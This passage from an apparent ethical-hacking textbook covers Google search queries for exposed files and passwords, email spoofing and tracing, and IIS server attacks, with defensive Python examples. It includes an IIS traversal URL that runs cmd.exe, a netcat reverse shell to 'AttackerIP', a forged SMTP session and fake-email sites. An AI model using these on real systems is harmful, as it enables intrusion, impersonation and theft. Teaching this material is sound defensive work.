intentional, they are also not the type of directory listings we are looking for.

Finding Specific Directories

In some cases it is useful not only to find directory listings but to find listings that expose a specific directory. This is easily accomplished by adding the name of the directory to the query. To locate "admin" directories exposed through directory listings, queries such as intitle:index.of.admin or intitle:index.of inurl:admin work well.


Finding Specific Files

Because of the directory-tree layout, it is also possible to find specific files in a directory listing. For example, to find WS_FTP log files, try a search such as intitle:index.of ws_ftp.log. This technique extends to just about any kind of file by keying on index.of in the title and the filename in the text of the Web page. You can also use filetype and inurl to search for specific files. To search again for ws_ftp.log files, try a query like filetype:log inurl:ws_ftp.log. This generally finds more results than the more restrictive index.of search.

Server Versioning

One piece of information an attacker can use to determine the best method for attacking a Web server is the exact software version. An attacker could retrieve it by connecting directly to the Web port of the server and reading the HTTP response headers (the Server: header). It is possible, however, to retrieve similar information from Google without ever connecting to the target server. One method uses the information provided in a directory listing: Apache-style listings end with a footer that names the server software and its version number. An adept Web administrator can fake this server tag, but most often the information is legitimate and exactly the type an attacker uses to refine his attack against the server. The Google query used to locate servers this way is a simple extension of intitle:index.of. The query intitle:index.of "server at" locates all directory listings on the Web with "index of" in the title and "server at" anywhere in the text of the page. This might not seem like a very specific search, but the results are very clean and do not require further refinement. To search for a specific server version, extend the query further, to something like intitle:index.of "Apache/1.3.27 Server at". In addition to the Web server version, the same footer can reveal the operating system of the server, as well as the modules and other software installed alongside it.
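As an added example (not part of the original material), the following Python script does what a tester does by eye on a listing found through these queries: it tells a genuine autoindex page apart from the "index of" false positives above, lists the exposed files, picks out the ones worth downloading first, and pulls the server version out of the "Server at" footer. The HTML is a constructed sample modelled on Apache's mod_autoindex output; the host, paths and version string are hypothetical.

```python
import re
from html.parser import HTMLParser

# Constructed sample modelled on Apache mod_autoindex output; host, paths
# and version are hypothetical.
SAMPLE_LISTING = """<html><head><title>Index of /backup</title></head>
<body><h1>Index of /backup</h1>
<pre><a href="?C=N;O=D">Name</a>  <a href="?C=M;O=A">Last modified</a>
<hr><a href="/">Parent Directory</a>
<a href="db-2003-06.sql">db-2003-06.sql</a>  12-Jun-2003 04:10  2.1M
<a href="ws_ftp.log">ws_ftp.log</a>          11-Jun-2003 22:01  14K
<a href="old/">old/</a>                      01-May-2003 09:00  -
<hr></pre>
<address>Apache/1.3.27 Server at files.example.test Port 80</address>
</body></html>"""

# File names worth a second look when they show up in a listing.
INTERESTING = re.compile(
    r"(ws_ftp\.log|\.sql|\.bak|\.old|\.conf|\.log|password|passwd)$", re.I)

# "Apache/1.3.27 Server at host Port 80", optionally with "(Unix) mod_x/..."
# tokens between the version and "Server at".
BANNER = re.compile(r"(?P<server>\S+/\S+).*? Server at (?P<host>\S+) Port (?P<port>\d+)")


class _ListingParser(HTMLParser):
    """Collect the title, every link (href + text) and the <address> footer."""

    def __init__(self):
        super().__init__()
        self.title = ""
        self.address = ""
        self.links = []          # [href, text] pairs
        self._in = None

    def handle_starttag(self, tag, attrs):
        if tag in ("title", "address"):
            self._in = tag
        elif tag == "a":
            self.links.append([dict(attrs).get("href", ""), ""])
            self._in = "a"

    def handle_endtag(self, tag):
        if tag == self._in:
            self._in = None

    def handle_data(self, data):
        if self._in == "title":
            self.title += data
        elif self._in == "address":
            self.address += data
        elif self._in == "a" and self.links:
            self.links[-1][1] += data


def parse_listing(html):
    """Return None if the page is not an autoindex listing, otherwise a dict
    with the listed directory, its entries and the advertised server banner."""
    p = _ListingParser()
    p.feed(html)
    m = re.match(r"Index of (/\S*)", p.title.strip())
    # A real listing has "Index of /path" as its title AND a Parent Directory
    # link; "LibDex - Worldwide index of ..." pages have neither.
    has_parent = any(text.strip() == "Parent Directory" for _, text in p.links)
    if not m or not has_parent:
        return None
    entries = [href for href, text in p.links
               if href and not href.startswith("?") and text.strip() != "Parent Directory"]
    result = {"directory": m.group(1), "entries": entries,
              "server": None, "host": None, "port": None}
    b = BANNER.search(p.address)
    if b:
        result.update(server=b.group("server"), host=b.group("host"), port=int(b.group("port")))
    return result


def interesting_entries(entries):
    """Filter listing entries down to the ones a tester would fetch first."""
    return [e for e in entries if INTERESTING.search(e)]


if __name__ == "__main__":
    info = parse_listing(SAMPLE_LISTING)
    print(info)
    print("worth a look:", interesting_entries(info["entries"]))
```

The same parser serves the "Finding Specific Files" technique: run it over every page a query returns and keep only the listings whose entries match the filenames you care about. The banner it extracts is exactly what the Server Versioning query keys on, so treat it as an unverified claim, since an administrator can change the footer text.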

Traversal Techniques

Attackers use traversal techniques to expand a small foothold into a larger compromise. A directory listing found with a query such as intitle:index.of inurl:"/admin/*" is only the starting point: from it the attacker follows the parent-directory link upwards and browses downwards into every subdirectory the listing exposes, instead of stopping at the single page Google returned.

Site Operator

The site operator is invaluable during the information-gathering phase of an assessment. A site search gathers information about the servers and hosts a target operates. Using simple reduction techniques, you can quickly get an idea of a target's online presence. Consider the simple example site:washingtonpost.com -site:www.washingtonpost.com. This query locates pages on the washingtonpost.com domain other than those on www.washingtonpost.com, that is, the other hostnames the organization exposes.


login | logon

Login portals can reveal the software and operating system of a target, and in many cases "self-help" documentation is linked from the main page of a login portal. These documents are designed to assist users who run into problems during the login process. Whether the user has forgotten a password or even a username, such a document can provide clues that help an attacker. Documentation linked from login portals lists the Email addresses, phone numbers or URLs of human assistants who help a troubled user regain lost access, and those assistants are natural social-engineering targets.

admin | administrator

The word administrator is often used to describe the person in control of a network or system. It can also be used to locate administrative login pages, or login portals. The phrase "contact your system administrator" is fairly common on the Web, as are several basic derivations. A query such as "please contact your * administrator" returns results that reference local, company, site, department, server, system, network, database, e-mail and even tennis administrators. If a Web user is told to contact an administrator, chances are that the data behind that page has at least moderate importance to a security tester.

Searching for Passwords

Password data, one of the "Holy Grails" of a penetration test, should be protected. Unfortunately, many Google queries can be used to locate passwords on the Web.

Google Hacking Database

The Google Hacking Database (GHDB) contains queries that identify sensitive data such as portal logon pages, logs with network security information, and so on. Visit http://johnny.ihackstuff.com (the GHDB has since moved and is now maintained as part of the Exploit Database at exploit-db.com).

Windows Registry Entries Can Reveal Passwords

A query like filetype:reg intext:"internet account manager" can reveal exported registry files containing keys with password data (Internet Account Manager is the registry key under which Outlook Express stored mail account settings).


6. EMAIL ATTACKS

Working of Emails:

Email sending and receiving is controlled by Email servers. Every Email service provider configures its servers before anyone can sign in to an account and start communicating digitally. Once the servers are ready, users from across the world register with them and set up Email accounts. With a working account, a user signs in and starts exchanging messages with other users of the Email services.

Email Travelling Path:

Let's say we have two Email providers, Server1.com and Server2.in. ABC is a registered user of Server1.com and XYZ is a registered user of Server2.in. ABC signs in to his Email account on Server1.com, writes a mail to [email protected], clicks Send and gets the message that the Email was sent successfully. What happens behind the curtain is this: the Email from the computer of [email protected] is handed to the Email server of Server1.com. Server1.com looks up server2.in on the Internet (a DNS lookup for its mail exchanger) and forwards the Email to server2.in for the account of XYZ. Server2.in receives the Email from server1.com and puts it in the mailbox of XYZ. XYZ then sits down at her computer, signs in to her Email account, and finds the message in her inbox.

[Figure: Email travelling path, from the sender at SERVER1.com, through the ISP, to SERVER2.in and the recipient's mailbox]


Email Service Protocols:

SMTP

SMTP stands for Simple Mail Transfer Protocol. SMTP is used when Email is submitted from an Email client, such as Outlook Express, to an Email server, and when Email is relayed from one Email server to another. Server-to-server SMTP uses port 25; client submission normally uses port 587 (or 465 with implicit TLS).

POP3

POP3 stands for Post Office Protocol version 3. POP3 allows an Email client to download Email from an Email server. The protocol is simple and offers few features beyond download. Its design assumes that the Email client downloads all available Email from the server, deletes it from the server and then disconnects. POP3 normally uses port 110 (995 with TLS).

IMAP

IMAP stands for Internet Message Access Protocol. IMAP shares many features with POP3: it, too, is a protocol an Email client uses to fetch Email from an Email server. However, IMAP includes many more features than POP3. It is designed to let users keep their Email on the server and work with the same folders and flags from several clients. IMAP requires more disk space and more CPU on the server than POP3, as all Email is stored there. IMAP normally uses port 143 (993 with TLS).

Email Server Configuration:

Email server software such as Postcast Server, hMailServer or SurgEmail can turn a desktop PC into an Email sending server. hMailServer is an Email server for Microsoft Windows. It lets you handle all your Email yourself without relying on an Internet service provider (ISP) to manage it. Compared to letting your ISP host your Email, hMailServer gives you flexibility and full control over spam protection; it also makes you responsible for keeping the server from becoming an open relay, as described below.

Email Security:

Now let's check how secure this fast means of communication is. Many attacks target Email, and the people who run them look for users who are unaware of these tricks and ready to fall into their trap. Make sure you are not an easy target: secure your mail identity and profile. Do not assume that it does not matter if your account is compromised because it holds nothing important. The attacker is often not interested in your data at all; he wants an Email ID to use as a vehicle in his attack, for example sending a threatening Email to a ministry or a news channel from your address. There are many ways to abuse a hijacked account. Most of us have seen cases where a student receives abusive or pornographic Email from a friend's address, and the owner of that address knows nothing about the message that was sent.


Email Spoofing:

Email spoofing is the forgery of an Email header so that the message appears to have originated from someone or somewhere other than the actual source. Distributors of spam often use spoofing in an attempt to get recipients to open, and possibly even respond to, their solicitations. Spoofing also has legitimate uses. There are many ways to send fake Email without knowing the password of the Email ID being impersonated, because SMTP itself does not authenticate the sender: anybody's Email ID can be placed in the From: header of a threatening Email to an official. Sender-authentication schemes layered on top of SMTP (SPF, DKIM and DMARC) let a receiving server detect such forgery for domains that publish them, but they do not stop the message from being sent.

Fake Email- Open Relay Server:

An open mail relay is an SMTP (Simple Mail Transfer Protocol) server configured so that it allows anyone on the Internet to send Email through it, not just mail destined to or originating from its own known users. An attacker can connect to the open relay with Telnet and instruct the server, command by command, to send the Email. An open relay requires no password to send mail.
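The exchange described above, as an added example that is not part of the original material: a toy SMTP server in Python that applies a relay policy, driven by the command sequence an attacker would type into Telnet. Hostnames and addresses are hypothetical and nothing touches the network. It shows two things at once: the server never verifies MAIL FROM or the From: header inside DATA, and the only thing between an attacker and a forged message is the relay check on RCPT TO.

```python
class SmtpRelaySim:
    """Toy SMTP server state machine with a relay policy.

    Constructed for illustration: just enough of the SMTP dialogue to show
    why an open relay is abusable.  Nothing here opens a socket.
    """

    def __init__(self, hostname, local_domains, open_relay=False):
        self.hostname = hostname
        self.local_domains = {d.lower() for d in local_domains}
        self.open_relay = open_relay
        self.queued = []          # (envelope_from, recipients, data_lines)
        self.reset()

    def reset(self):
        self.mail_from = None
        self.rcpts = []
        self.in_data = False
        self.data = []

    def banner(self):
        return f"220 {self.hostname} ESMTP"

    def handle(self, line):
        """Process one client line; return the server reply, or None while
        the message body is being received."""
        if self.in_data:
            if line == ".":
                self.in_data = False
                self.queued.append((self.mail_from, list(self.rcpts), list(self.data)))
                self.reset()
                return "250 2.0.0 Ok: queued"
            self.data.append(line)     # headers included: From: is whatever the client says
            return None
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):
            return f"250 {self.hostname}"
        if verb == "MAIL":
            self.mail_from = _addr(arg)   # any sender accepted: SMTP never checks it
            return "250 2.1.0 Ok"
        if verb == "RCPT":
            if self.mail_from is None:
                return "503 5.5.1 Error: need MAIL command"
            rcpt = _addr(arg)
            domain = rcpt.rpartition("@")[2].lower()
            # The relay policy lives here and nowhere else.
            if self.open_relay or domain in self.local_domains:
                self.rcpts.append(rcpt)
                return "250 2.1.5 Ok"
            return "554 5.7.1 Relay access denied"
        if verb == "DATA":
            if not self.rcpts:
                return "503 5.5.1 Error: need RCPT command"
            self.in_data = True
            return "354 End data with <CR><LF>.<CR><LF>"
        if verb == "QUIT":
            return "221 2.0.0 Bye"
        return "502 5.5.2 Error: command not recognized"


def _addr(arg):
    """Pull the address out of 'FROM:<a@b>' or 'TO:<a@b>'."""
    return arg.split(":", 1)[-1].strip().strip("<>")


def run_session(server, client_lines):
    """Feed the client's lines to the server; return the transcript as
    (direction, text) tuples, "C" for client and "S" for server."""
    transcript = [("S", server.banner())]
    for line in client_lines:
        transcript.append(("C", line))
        reply = server.handle(line)
        if reply is not None:
            transcript.append(("S", reply))
    return transcript


def replies(transcript):
    return [text for direction, text in transcript if direction == "S"]


# What an attacker types into telnet: envelope sender and From: header are
# both forged, and the server has no way to tell.
FORGED_SESSION = [
    "HELO attacker.example",
    "MAIL FROM:<ceo@victim.example>",
    "RCPT TO:<target@elsewhere.example>",
    "DATA",
    "From: The CEO <ceo@victim.example>",
    "To: target@elsewhere.example",
    "Subject: Urgent",
    "",
    "Wire the funds today.",
    ".",
    "QUIT",
]

if __name__ == "__main__":
    for label, srv in (("open relay", SmtpRelaySim("mx.example.test", ["example.test"], open_relay=True)),
                       ("closed relay", SmtpRelaySim("mx.example.test", ["example.test"]))):
        print(f"--- {label} ---")
        for direction, text in run_session(srv, FORGED_SESSION):
            print(f"{direction}: {text}")
```

On the open relay the forged message is queued for an outside recipient; on the closed relay the RCPT TO is refused with 554 and the subsequent DATA fails with 503, while delivery to the server's own domain still works. Against a real server the same test is a manual Telnet session to port 25: if RCPT TO for a foreign domain gets 250, the relay is open.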

Fake Email- Web Script:

Web programming languages such as PHP and ASP provide mail-sending functions, and the script that calls them controls the message headers ("From:", "To:", "Subject:"), so a forged From: header is simply a string the script sets. Many websites on the Internet already host such mail-sending scripts, and most of them provide the service free. Some free anonymous Email websites are:

Mail.Anonymizer.name (Send attachments as well)

FakEmailer.net

FakEmailer.info

Deadfake.com

Fake Email- Consequences:

An Email from your Email ID to a security agency announcing a bomb blast can make you spend the rest of your life behind bars.

An Email from you to your girlfriend or boyfriend can cause a break-up.

An Email from your Email ID to your boss carrying your resignation letter, or anything else you can think of.

Many such cases can be built on fake Emails.

Fake Email- Proving:

Every Email carries a header that records the path the message travelled.

Check the header and work out where the Email was sent from.

Check whether the Email was sent from another Email server or from a website.

When a web-based mail-sending script was used, the headers carry the name of the website that sent it, typically in the Received: line added by the web host's outgoing mail server.


Email Bombing:

Email bombing is the repeated sending of Email messages to a particular address at a victim site. In many instances the messages are large and constructed from meaningless data in an effort to consume additional system and network resources. Multiple accounts at the target site may be abused, increasing the denial-of-service impact.

Email Spamming:

Email spamming is a variant of bombing; it refers to sending Email to hundreds or thousands of users (or to lists that expand to that many users). Spamming is made worse if recipients reply to the Email, causing all the original addressees to receive the reply. It may also occur innocently, as a result of sending a message to a mailing list without realizing that the list explodes to thousands of users, or as a result of an auto-responder (such as vacation(1)) that is set up incorrectly.

Email Password Hacking:

There is no single attack that exists just to obtain the password of an Email account, and it is not easy to compromise an Email provider such as Yahoo or Gmail directly. Email password hacking is therefore accomplished through client-side attacks: the attacker compromises the user, or the user's machine, and captures the password before it reaches the Email server.

Phishing Attack

Phishing is the act of sending an Email that falsely claims to come from an established, legitimate enterprise in an attempt to scam the user into surrendering private information for use in identity theft. The Email directs the user to a website where they are asked to update personal information, such as passwords and credit card, social security and bank account numbers, that the legitimate organization already has. The website, however, is bogus and set up only to steal the user's information.

Phishing scams could be:

Emails inviting you to join a social group, asking you to log in with your username and password.

Emails saying that your bank account is locked and asking you to sign in to your account to unlock it.

Emails containing some information of interest to you and asking you to log in to your account.

Any Email carrying a link to click and asking you to log in.


Prevention against Phishing

Read every Email carefully and check that the sender is genuine: the display name can say anything, so look at the actual address, and at the authentication results if your client shows them.

Watch the link carefully before clicking; the visible text and the real destination can differ.

Always check the URL in the browser's address bar before signing in to your account.

Always log in to your accounts by opening the trusted website yourself, not by clicking a link in another website or in an Email.
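The link checks in the list above, written out as code. This is an added example, not part of the original material: a Python function that applies the same tests a careful reader applies by eye to a link in an Email (does the visible text match the real host, is the brand name buried in someone else's domain, is it a lookalike spelling, a raw IP address, a user@host trick, or plain HTTP). The brand list and all hosts are hypothetical; the registrable-domain helper is deliberately crude and a real deployment would use the Public Suffix List.

```python
import unicodedata
from urllib.parse import urlparse

# Hypothetical: the brands a mail gateway or client has been told to protect.
KNOWN_BRANDS = {"examplebank.test": "Example Bank"}

# Common digit/symbol substitutions used in lookalike domains.
CONFUSABLES = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t", "@": "a", "$": "s"})


def registrable_domain(host):
    """Crude eTLD+1: the last two labels.  Enough for .test/.com-style names."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def suspicious_link(link_text, href):
    """Return the list of reasons a link looks like phishing (empty = clean)."""
    reasons = []
    u = urlparse(href)
    host = (u.hostname or "").lower()
    if u.scheme not in ("http", "https"):
        reasons.append(f"unexpected scheme {u.scheme!r}")
    if u.scheme == "http":
        reasons.append("login link is not HTTPS")
    if host and all(part.isdigit() for part in host.split(".")):
        reasons.append("raw IP address instead of a hostname")
    if "@" in u.netloc:
        reasons.append("userinfo before the host (user@host trick)")
    # Link text that is itself a URL must point where it says it does.
    t = urlparse(link_text.strip())
    if t.hostname and registrable_domain(t.hostname) != registrable_domain(host):
        reasons.append(f"text says {t.hostname} but link goes to {host}")
    reg = registrable_domain(host)
    for brand_domain, brand in KNOWN_BRANDS.items():
        brand_label = brand_domain.split(".")[0]
        if reg == brand_domain:
            continue                                  # genuinely the brand's domain
        if brand_label in host:
            # examplebank.test.secure-login.example: brand as a subdomain of
            # a domain registered to someone else.
            reasons.append(f"{brand} name inside a domain registered to {reg}")
        label = reg.split(".")[0]
        normalized = unicodedata.normalize("NFKC", label).translate(CONFUSABLES)
        if normalized == brand_label and label != brand_label:
            reasons.append(f"lookalike of {brand_domain}: {reg}")
    return reasons


if __name__ == "__main__":
    for text, href in [("Sign in", "https://examplebank.test/login"),
                       ("Sign in", "http://examplebank.test.secure-login.example/login"),
                       ("Sign in", "https://examp1ebank.test/"),
                       ("https://examplebank.test", "https://203.0.113.5/login")]:
        print(href, "->", suspicious_link(text, href) or "looks clean")
```

Each reason maps to one of the prevention rules: the address-bar check catches the raw IP and the mismatch between text and destination; the "open the trusted site yourself" rule is what defeats the subdomain and lookalike cases, because no amount of staring at a cleverly chosen hostname is reliable.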

Email Tracing:

Tracing an Email means locating the original sender, that is, learning the IP address of the network from which the Email was actually generated. To get information about the sender of an Email we must first know the structure of a message; we already know how Email travels. Each message has exactly one header section, which is structured into fields, and each field has a name and a value. The header contains the valuable information about the path and the original sender: every mail server that handles the message prepends a Received: field naming the host it got the message from, usually with that host's IP address, so the Received: fields read from bottom to top trace the path from sender to recipient.

Check how the headers are displayed in different Email service providers (most webmail clients have a "show original" or "view headers" option).

Locating the sender: you can get the IP address of the sender from the header and then locate the sender. Only the Received: fields added by servers you trust are reliable; the lowest ones may have been forged by the sender, and webmail providers often record only their own servers rather than the sender's computer.

Once you have the IP address of the sender, go to www.ip2location.com and find the location of the IP address. Geolocation is approximate: it places the address's network operator, not the sender's desk.
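The header walk described here and under "Fake Email- Proving", as an added example that is not part of the original material. The Python below parses a constructed raw message (hostnames are hypothetical; IP addresses come from the documentation ranges), lists the Received: hops in travel order, gives the naive answer (the IP in the oldest hop) and the careful one (the IP recorded by the first hop that one of your own servers added, since anything below that line was written by machines outside your control and may be forged).

```python
import email
import re

# Constructed message, laid out as it arrives at the recipient: the newest
# Received: field is on top.  Hosts are hypothetical; IPs are RFC 5737 ranges.
SAMPLE_MESSAGE = """\
Received: from mx.server2.example (mx.server2.example [203.0.113.10])
\tby mailstore.server2.example with ESMTP id 1
\tfor <xyz@server2.example>; Mon, 02 Jun 2003 10:01:05 +0000
Received: from smtp.server1.example (smtp.server1.example [198.51.100.25])
\tby mx.server2.example with ESMTP id 2; Mon, 02 Jun 2003 10:01:03 +0000
Received: from webmail.server1.example ([192.0.2.77] helo=webmail)
\tby smtp.server1.example with ESMTPA id 3; Mon, 02 Jun 2003 10:00:58 +0000
X-Originating-IP: [192.0.2.77]
From: "ABC" <abc@server1.example>
To: xyz@server2.example
Subject: hello
Message-ID: <1@server1.example>

body
"""

IP_RE = re.compile(r"\[?(\d{1,3}(?:\.\d{1,3}){3})\]?")
HOP_RE = re.compile(r"from\s+(?P<from>\S+).*?\bby\s+(?P<by>\S+)", re.S)


def received_chain(raw):
    """Return the Received: hops oldest-first as dicts: the host the message
    claimed to come from, the IP the receiving server recorded, and the
    receiving server's own name."""
    msg = email.message_from_string(raw)
    hops = []
    # Each MTA prepends its own Received: field, so the message lists them
    # newest-first; reverse to read the path in travel order.
    for hdr in reversed(msg.get_all("Received", [])):
        text = " ".join(str(hdr).split())          # unfold continuation lines
        m = HOP_RE.search(text)
        ip = IP_RE.search(text)
        hops.append({"from": m.group("from") if m else None,
                     "ip": ip.group(1) if ip else None,
                     "by": m.group("by") if m else None})
    return hops


def originating_ip(raw):
    """The naive answer: the IP in the oldest Received: field, falling back
    to X-Originating-IP.  Correct for an honest message, forgeable otherwise."""
    for hop in received_chain(raw):
        if hop["ip"]:
            return hop["ip"]
    xo = email.message_from_string(raw).get("X-Originating-IP")
    m = IP_RE.search(xo) if xo else None
    return m.group(1) if m else None


def last_verifiable_ip(raw, trusted_domain):
    """The careful answer: walking oldest-first, the IP recorded by the first
    hop added by one of *our* servers (those under trusted_domain).  That is
    the machine that actually connected to us; everything below it in the
    header was written by someone else."""
    for hop in received_chain(raw):
        if hop["by"] and hop["by"].endswith(trusted_domain):
            return hop["ip"]
    return None


if __name__ == "__main__":
    for i, hop in enumerate(received_chain(SAMPLE_MESSAGE)):
        print(f"hop {i}: {hop['from']} [{hop['ip']}] -> {hop['by']}")
    print("naive origin:     ", originating_ip(SAMPLE_MESSAGE))
    print("last verifiable:  ", last_verifiable_ip(SAMPLE_MESSAGE, "server2.example"))
```

For the sample the two answers differ: the naive trace points at 192.0.2.77 (the webmail user), while the recipient's own servers can only vouch for 198.51.100.25, the sending provider's outgoing server. Whichever you feed to a geolocation service, remember that a webmail or relay address locates the provider, not the person.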

Securing Your Email Account:

Always configure a secondary Email address for recovery purposes.

Properly configure the security question and answer in the Email account, and pick an answer that cannot be looked up.

Do not open Emails from strangers.

Do not use anyone else's computer to check your Email.

Take care with phishing links.

Do not reveal your passwords to your friends or mates.

7. WEBSITE ATTACKS

Hacking Web Servers

Web hacking is a critical topic because much of the Internet is devoted to e-commerce. Web traffic is typically allowed through a firewall or border router, so there is considerable risk involved.

Web Server Identification

While standard web servers run on ports 80 (HTTP) and 443 (HTTPS), other ports should also be scanned when looking for web-based applications. These include the following:


88 – Kerberos

2779 - Windows 2000 Web Server

8080 – Squid

8888 – Alternate Web Server

Some of the most popular tools used to scan for these services include Nmap, NetScan Tools and SuperScan.

Web Server Enumeration

Once possible web servers have been identified, the attacker usually attempts to enumerate the web server vendor and version. The most popular web servers include IIS, Apache and Sun ONE Web Server. Common tools for determining what a web server is running include Nmap, Telnet (reading the Server: response header by hand) and web sites such as Netcraft.

Vulnerability Identification

Once the attacker has identified the vendor and version of the web server, he searches for vulnerabilities. Some of the sites an attacker or a security administrator would visit to identify possible vulnerabilities include:

http://www.packetstormsecurity.com

http://icat.nist.gov/icat.cfm (ICAT has since become the National Vulnerability Database, nvd.nist.gov)

http://neworder.box.sk

The security administrator should also consider running an automated vulnerability scanner. Several are worth mentioning: WebInspect, Whisker, N-Stealth Scanner, Nessus and Shadow Security Scanner.

Vulnerability Exploitation

IIS may seem to be the target of many attacks, but this is partly because it is so widely used. Others, such as Apache, have also been targeted and have their share of vulnerabilities. Attackers take the path of least resistance; if that happens to be the web server, expect it to be targeted. Some common exploits are discussed below.

ISAPI DLL Buffer Overflows

This exploit targets idq.dll, the ISAPI extension for the IIS Indexing Service. A crafted request overflows a buffer and can compromise any server running IIS. What makes this vulnerability particularly malicious is that the Indexing Service does not even need to be running; the ISAPI mapping for .ida and .idq requests is enough. Because idq.dll runs as SYSTEM inside the IIS process, the attacker lands with full privileges and can simply add himself to the Administrators group. The Code Red worm of 2001 spread through this flaw.

IPP Printer Overflow

This buffer overflow also targets an ISAPI extension, the one that handles Internet Printing Protocol requests (msw3prt.dll). If the Host: header of a request for a .printer resource is at least about 420 bytes long, the buffer overflows and can return a command prompt to the attacker. Several tools exploit this vulnerability; jill-win32 is one example.


ISAPI DLL Source Disclosure

Because of vulnerabilities in ISM.dll, the ISAPI extension for .htr files, IIS 4 and IIS 5 can be made to return the source of a server-side file rather than executing it. An attacker accomplishes this by appending +.htr to the request for a file such as global.asa.

IIS Directory Traversal

This vulnerability allows an attacker to back out of the web root and reach any location on the same logical drive. Two iterations of this attack are:

Unicode

Double Decode

Both are possible because IIS checked the request path for traversal before it had finished decoding it. In the Unicode variant, %c0%af is an overlong UTF-8 encoding of "/": the traversal check did not treat it as a path separator, but the decoder that ran afterwards did, so the ".." segments it separated were never counted. In the double-decode variant the path is percent-encoded twice (for example %255c for "\"); the check ran after the first decode and the second decode produced the separator. A request of the following form runs cmd.exe:

http://target/vulnerablefolder/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

and returns a directory listing of C:\ in the response.

The attacker can place this string in the browser or script the attack with a tool such as NetCat. If the attacker can run cmd.exe, he is only a few steps away from owning the box. Back in 2001, the Nimda worm used this same vulnerability to ravage web servers.
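The order-of-operations bug behind the Unicode traversal, modelled in Python as an added example (not code from the original material or from IIS). A lenient deco­der accepts the overlong two-byte form, as the vulnerable IIS code did; the "vulnerable" resolver confines the still-encoded path and decodes afterwards, while the "fixed" resolver decodes once and strictly, refuses a second encoding layer, and confines the canonical result. The virtual directory /scripts and its physical mapping /inetpub/scripts are hypothetical stand-ins for the real Windows paths.

```python
import posixpath
from urllib.parse import unquote_to_bytes

# Request path of the kind shown above (hypothetical virtual directory
# /scripts mapped to the physical directory /inetpub/scripts).
ATTACK = "/scripts/..%c0%af../winnt/system32/cmd.exe"


def lenient_utf8_decode(data):
    """Decode bytes the way the vulnerable IIS code did: a two-byte UTF-8
    sequence is accepted even when its value fits in one byte ("overlong"),
    so C0 AF becomes '/' (0x2F).  A strict decoder rejects it."""
    out = []
    i = 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b <= 0xDF and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            raise ValueError(f"unsupported byte 0x{b:02x} at offset {i}")
    return "".join(out)


def _inside(path, root):
    return path == root or path.startswith(root + "/")


def iis_vulnerable(path, vdir="/scripts", physical="/inetpub/scripts"):
    """The exploitable order of operations: confine the still-encoded path
    to the virtual directory, then decode it and map it to disk."""
    # Here "..%c0%af.." is just an odd-looking file name, so the ".." that
    # follows merely climbs back out of it and the check passes.
    if not _inside(posixpath.normpath(path), vdir):
        return None
    # The decoder now turns %c0%af into '/', creating ".." segments the
    # check never saw.
    decoded = lenient_utf8_decode(unquote_to_bytes(path)).replace("\\", "/")
    return posixpath.normpath(physical + decoded[len(vdir):])


def iis_fixed(path, vdir="/scripts", physical="/inetpub/scripts"):
    """Decode once, strictly; refuse a second encoding layer; canonicalize;
    then confine both the virtual and the physical path."""
    try:
        decoded = unquote_to_bytes(path).decode("utf-8")   # rejects C0 AF
    except UnicodeDecodeError:
        return None
    if "%" in decoded:                 # %255c -> %5c: the double-decode trick
        return None
    canon = posixpath.normpath(decoded.replace("\\", "/"))
    if not _inside(canon, vdir):
        return None
    full = posixpath.normpath(physical + canon[len(vdir):])
    return full if _inside(full, physical) else None


if __name__ == "__main__":
    print("vulnerable:", iis_vulnerable(ATTACK))   # /winnt/system32/cmd.exe
    print("fixed:     ", iis_fixed(ATTACK))        # None
```

The plain "../" form is caught by both resolvers, which is why the encoded forms were needed; the fixed resolver also refuses the legitimate-looking request only when something is actually wrong with it, so ordinary paths under the virtual directory still resolve.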

Shoveling the Shell

For the final step the attacker needs only two commands. A command shell is then returned to his computer, running with whatever privileges the exploited process had: SYSTEM for the ISAPI overflows above, but only the anonymous IUSR account in the directory-traversal case, which is why privilege escalation is the next step.

On the attacker's computer: nc.exe -l -p <Open Port>

On the compromised server: nc.exe -v -e cmd.exe AttackerIP <Open Port>

Escalating Privileges on IIS

Some well-known privilege escalation tools are GetAdmin, HK, PipeUpAdmin and IIScrack.dll (httpodbc.dll). This completes the system hack, as the attacker now has administrator privileges on the computer.

Clearing IIS Logs

As with any other attack, expect the attacker to try to remove or alter the log files at C:\Winnt\system32\Logfiles\W3SVC1, since they will most likely record the attacker's IP address. Forwarding IIS logs to a separate log host as they are written is the defence: an attacker with a shell on the web server can edit the local copy but not the copy already shipped.


File System Traversal Countermeasures

Countermeasures include:

Apply current patches

Move or rename cmd.exe

Separate the OS and applications by using two logical partitions (a traversal from a web root on D: cannot reach \winnt\system32 on C:)

Remove execute permission on cmd.exe and the other system binaries for the IUSR account

Securing IIS

As always, the best defence is a good offence, so there is no better time than now to make sure your web server is locked down. Some good tools for the task:

UpdateExpert

Microsoft HotFix Checker (hfnetchk)

IIS Lockdown (with the URLScan request filter)

Microsoft Baseline Security Analyzer

Cacls (the command-line ACL editor, for tightening file permissions)

Web Application Vulnerabilities

Footprinting

The methodology for assessing web applications is the same as for the other services we have examined. The attacker gathers as much information as possible about the site to understand its function, design and purpose. One good tool for this is Instant Source, which displays the HTML source behind the page being viewed.

Directory Structure

The most efficient way to determine the directory structure is with a site-ripping tool, which downloads the entire site locally. Once the site has been duplicated, the attacker can examine the directory structure, analyse the site design, sift through the source, and look for clues that identify the underlying web applications. Some excellent site-ripping tools are Wget, Black Widow and WebSleuth.

Documenting the Application Structure

Once the underlying applications have been uncovered, the attacker searches the web for vulnerabilities in them. He will also check the application vendor's web site: vendors are often so proud of their products that they list all of their clients, and that list can be used to immediately target other sites running the same vulnerable software.


Input Validation

Another huge problem with web applications is client-side data. Any time data passes from the client to the server it must be checked on the server. Without proper input validation, the web application can be tricked into accepting invalid input.

Hidden Value Fields

